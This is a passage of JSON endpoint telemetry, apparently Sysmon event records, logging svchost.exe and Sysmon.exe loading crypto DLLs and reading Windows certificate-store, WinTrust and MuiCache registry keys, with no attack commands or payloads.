"process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mskeyprotect.dll", - "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", - "registry_value": "AuthRoot", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", - "registry_value": "SmartCardRoot", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 